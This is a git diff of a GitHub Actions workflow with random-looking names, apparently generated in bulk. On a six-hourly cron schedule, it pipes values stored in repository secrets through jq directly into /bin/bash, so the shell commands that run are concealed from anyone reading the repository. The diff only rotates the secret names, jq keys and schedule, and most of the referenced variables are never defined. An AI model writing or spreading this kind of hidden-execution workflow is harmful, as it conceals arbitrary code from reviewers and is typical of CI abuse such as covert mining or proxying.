--- a/.github/workflows/maoziran6798.yml
+++ b/.github/workflows/maoziran6798.yml
@@ -1,26 +1,19 @@
 name: maoziran6798
+
 on:
   workflow_dispatch:
   schedule:
-    - cron: '57 5/6 * * *'
-jobs:  # 18594
+    - cron: '29 0/6 * * *'
+jobs:
   build:
     runs-on: ubuntu-latest
     steps:
       - uses: actions/checkout@v4
       - name: maoziran6798
         env:
-          bmmsk4: ${{ secrets.bmmsk4 }}
+          gskm4609: ${{ secrets.gskm4609 }}
         run: |
-          echo $bmmsk4 | jq -r .ny6588 | /bin/bash
-          echo $ft871 | jq -r .vwf22948 | /bin/bash
-          echo $h7 | jq -r .hii748 | /bin/bash
-          echo $wbjeg8196 | jq -r .al8463 | /bin/bash
-          echo $vxpbo4668 | jq -r .ti92 | /bin/bash
-          echo $ocf57585 | jq -r .yvqmv43 | /bin/bash
-          echo $t84801 | jq -r .vfr759 | /bin/bash
-          echo $vt0948 | jq -r .slvhi203 | /bin/bash
-          echo $pki08 | jq -r .qe93066 | /bin/bash
-          echo $ff72767 | jq -r .osmp9 | /bin/bash
-          echo $kwp89 | jq -r .qkdt96 | /bin/bash
+          echo $gskm4609 | jq -r .x7 | /bin/bash
+          echo $yfd4 | jq -r .vu5 | /bin/bash
+          echo $fg64 | jq -r .suwo0 | /bin/bash
 
